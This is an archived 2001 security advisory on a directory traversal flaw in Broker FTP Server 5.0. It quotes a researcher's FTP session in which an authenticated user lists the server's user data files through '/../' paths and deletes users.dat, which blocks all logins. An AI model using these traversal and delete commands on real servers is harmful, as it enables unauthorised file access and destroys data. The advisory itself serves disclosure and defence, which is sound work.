SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Broker FTP Server Vendors:   TranSoft Ltd.
TranSoft's Broker FTP Server for Windows Allows File and Directory Access and FTP Command Execution Outside of the Server's Root Directory
SecurityTracker Alert ID:  1000988
SecurityTracker URL:  http://securitytracker.com/id/1000988
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 5 2001
Impact:   Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): v5.0, possibly others
Description:   The Broker FTP Server software allows directory traversal such that users can access files and directories outside of the server's root directory. In addition, certain FTP commands may be permitted outside of the server's root directory.

Commands such as delete can be executed.

Some command examples and transcripts are contained in the original report.

Impact:   A remote authorized user can access server files and directories outside of the established server root directory. The user may also be able to execute commands on those files and directories.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.transsoft.com/broker.htm (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Broker Ftp Server 5.0 Vulnerability


Vulnerability:

users can break out of their root directory and list 
directories.
Depending on the priv. you have other commands 
like delete maybe
executed outside of the home. directory.


e:\crap\ was used as homedir. 
deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir:
listings directories outside of root dir.
Risc: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 
bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 
323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp          175 Nov 19  2000 
UserGrps.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 
Users.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:33 
Users.4800.bak
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:34 
Users.4800-Prof.bak
-rw-rw-rw-   1 ftp      ftp           31 Mar 03 16:59 
BannCtrl.ini
-rw-rw-rw-   1 ftp      ftp           34 Mar 03 17:08 
KickCtrl.ini
-rw-rw-rw-   1 ftp      ftp           38 Mar 03 16:37 
Events_1.dat
-rw-rw-rw-   1 ftp      ftp            0 Mar 03 16:53 
Events_lst_1.dat
-rw-rw-rw-   1 ftp      ftp          154 Mar 03 16:54 Kopie 
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 
629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' 
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

by deleting users.dat, noone will be able to logon ...


put/get commands seem to be secure...

This was tested with win2k and trail version of broker 
ver. 5.0


se00020@fhs-hagenberg.ac.at or
se00020@lion.cc

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC